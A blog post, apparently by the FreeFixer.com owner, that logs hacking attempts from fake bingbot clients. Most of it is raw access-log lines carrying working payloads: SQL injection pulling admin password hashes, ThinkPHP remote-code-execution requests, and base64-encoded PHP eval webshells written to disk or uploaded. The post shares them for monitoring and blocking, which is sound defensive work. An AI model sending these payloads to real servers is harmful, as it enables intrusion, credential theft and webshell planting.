124.156.120.3 - - [17/Sep/2019:14:09:08 -0700] "HEAD //news/html/?410%27union//select//1//from//(select//count(),concat(floor(rand(0)2),0x3a,(select//concat(0x23,0x23,0x23,user,0x3a,password,0x23,0x23,0x23)//from//pwn_base_admin//limit//0,1),0x3a)a//from//information_schema.tables//group//by//a)b//where%271%27=%271.html HTTP/1.1" 404 394 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:08 -0700] "HEAD //install/index.php?_m=frontpage&_a=setting&default_tpl=jixie-110118-a16 HTTP/1.1" 404 394 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:09 -0700] "HEAD //Database/NwebCn_Site.mdb HTTP/1.1" 404 394 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:09 -0700] "HEAD //admin/login/login_check.php?met_cookie_filter%5Ba%5D=a%27,admin_pass=md5(1234567)+where+id=1;+%23-- HTTP/1.1" 200 196 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:11 -0700] "POST //admin/login/login_check.php?langset=cn HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:11 -0700] "HEAD //mx_form HTTP/1.1" 404 394 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:12 -0700] "HEAD //SiteFiles/Module/cms/logo.gif HTTP/1.1" 404 398 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:12 -0700] "GET //member/login.php/aa'UNION%20SELECT%20(select%20concat(admin_id,0x23,admin_pass)%20from%20met_admin_table%20limit%201),2,3,4,5,6,1111,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29%23/aa HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:13 -0700] "POST //index.php?c=upload&f=save HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:13 -0700] "POST //index.php?g=Api&m=Plugin&a=fetch HTTP/1.1" 404 415 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

106.52.197.96 – Hacking Attempt

Recently I’ve been keeping an eye on the traffic at FreeFixer.com and trying to block fake Bing and Google bots and other types of bad behaviour. This morning I found a bunch of hacking attempts from 106.52.197.96, which by they way appears to be located on the Tencent cloud computing (Beijing) Co., Ltd network range. I’m guessing one of Tencent’s cloud clients got hacked.

I’ve posted the requests below. 106.52.197.96 attempts to inject some PHP and SQL code. For obvious reason, this IP will be blocked in .htaccess.

106.52.197.96 - - [15/Sep/2019:20:00:03 -0700] "PUT //9n2q0m7jOHN7dcr6.txt HTTP/1.1" 404 4696 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:07 -0700] "GET //type.php?template=tag_(){};@unlink(FILE);print_r(blshell);assert($_POST[58B040zuEc1FAlfs]);{//../rss HTTP/1.1" 404 4696 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:07 -0700] "GET //data/cache_template/rss.tpl.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:11 -0700] "GET //index.php?s=index/\think\template\driver\file/write&cacheFile=19x8MpcV8A7T9DEl.php&content=%3C%3F%70%68%70%0D%0A%0D%0A%0D%0A%24%5F%63%6F%6E%66%69%67%20%3D%20%61%72%72%61%79%28%29%3B%0D%0A%0D%0A%2F%2F%20%20%20%43%4F%4E%46%49%47%20%41%41%41%0A%0D%45%56%41%4C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%20%20%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%61%61%61%0A%0D%65%76%61%6C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%27%5D%20%3D%20%27%61%61%61%61%27%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%53%4F%55%52%43%45%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%6C%6F%63%61%6C%68%6F%73%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%72%6F%6F%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%64%69%73%63%75%7A%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%63%64%62%5F%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%54%41%52%47%45%54%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%6C%6F%63%61%6C%68%6F%73%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%72%6F%6F%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%64%69%73%63%75%7A%78%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%70%72%65%5F%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%55%43%45%4E%54%45%52%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%54%48%45%20%45%4E%44%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%0D%0A%3F%3E%3C%3F%70%68%70%20%65%63%68%6F%20%27%65%63%68%6F%27%2E%27%54%68%69%6E%6B%50%48%50%27%3F%3E HTTP/1.1" 404 4698 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:11 -0700] "GET //19x8MpcV8A7T9DEl.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:11 -0700] "GET //?s=index/\think\template\driver\file/write&cacheFile=19x8MpcV8A7T9DEl.php&content=%3C%3F%70%68%70%0D%0A%0D%0A%0D%0A%24%5F%63%6F%6E%66%69%67%20%3D%20%61%72%72%61%79%28%29%3B%0D%0A%0D%0A%2F%2F%20%20%20%43%4F%4E%46%49%47%20%41%41%41%0A%0D%45%56%41%4C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%20%20%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%61%61%61%0A%0D%65%76%61%6C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%27%5D%20%3D%20%27%61%61%61%61%27%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%53%4F%55%52%43%45%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%6C%6F%63%61%6C%68%6F%73%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%72%6F%6F%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%64%69%73%63%75%7A%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%63%64%62%5F%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%54%41%52%47%45%54%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%6C%6F%63%61%6C%68%6F%73%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%72%6F%6F%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%64%69%73%63%75%7A%78%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%70%72%65%5F%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%55%43%45%4E%54%45%52%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%54%48%45%20%45%4E%44%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%0D%0A%3F%3E%3C%3F%70%68%70%20%65%63%68%6F%20%27%65%63%68%6F%27%2E%27%54%68%69%6E%6B%50%48%50%27%3F%3E HTTP/1.1" 200 7349 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:12 -0700] "GET //19x8MpcV8A7T9DEl.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:12 -0700] "GET //?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=19x8MpcV8A7T9DEl.php&vars[1][]=%3C%3F%70%68%70%0D%0A%0D%0A%0D%0A%24%5F%63%6F%6E%66%69%67%20%3D%20%61%72%72%61%79%28%29%3B%0D%0A%0D%0A%2F%2F%20%20%20%43%4F%4E%46%49%47%20%41%41%41%0A%0D%45%56%41%4C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%20%20%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%61%61%61%0A%0D%65%76%61%6C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%27%5D%20%3D%20%27%61%61%61%61%27%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%53%4F%55%52%43%45%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%6C%6F%63%61%6C%68%6F%73%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%72%6F%6F%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%64%69%73%63%75%7A%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%63%64%62%5F%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%54%41%52%47%45%54%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%6C%6F%63%61%6C%68%6F%73%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%72%6F%6F%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%64%69%73%63%75%7A%78%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%70%72%65%5F%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%55%43%45%4E%54%45%52%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%54%48%45%20%45%4E%44%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%0D%0A%3F%3E%3C%3F%70%68%70%20%65%63%68%6F%20%27%65%63%68%6F%27%2E%27%54%68%69%6E%6B%50%48%50%27%3F%3E HTTP/1.1" 200 8202 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:13 -0700] "GET //19x8MpcV8A7T9DEl.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:13 -0700] "GET //?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=@eval($_GET[%27fuck%27]);&fuck=fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbYmxibF0pPz5ibHNoZWxs)); HTTP/1.1" 200 8204 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:14 -0700] "GET //x.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

106.52.197.96 - - [15/Sep/2019:20:00:14 -0700] "POST //index.php?s=index HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

106.52.197.96 - - [15/Sep/2019:20:00:15 -0700] "GET //d.php HTTP/1.1" 404 419 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:19 -0700] "GET //i.php HTTP/1.1" 404 4696 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:19 -0700] "GET //user.php?act=login HTTP/1.1" 404 415 "45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:\"num\";s:289:\"/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a326b75634768774a79776e4a45496a5444772f63476877494756325957776f4a46395154314e55573139644b54732f506963702729293b2f2f7d787878,10-- -\";s:2:\"id\";s:11:\"-1' UNION/\";}45ea207d7a2b68c49582d2d22adf953a" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:20 -0700] "GET //i.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:24 -0700] "GET //index.php?c=api&m=data2&auth=50ce0d2401ce4802751739552c8e4467&param=update_avatar&file=data:image/php;base64,PD9waHAgQGV2YWwoJF9QT1NUW3NoZWxsXSk7Pz5ibHNoZWxs HTTP/1.1" 404 4698 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:24 -0700] "GET //uploadfile/member/0/0x0.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
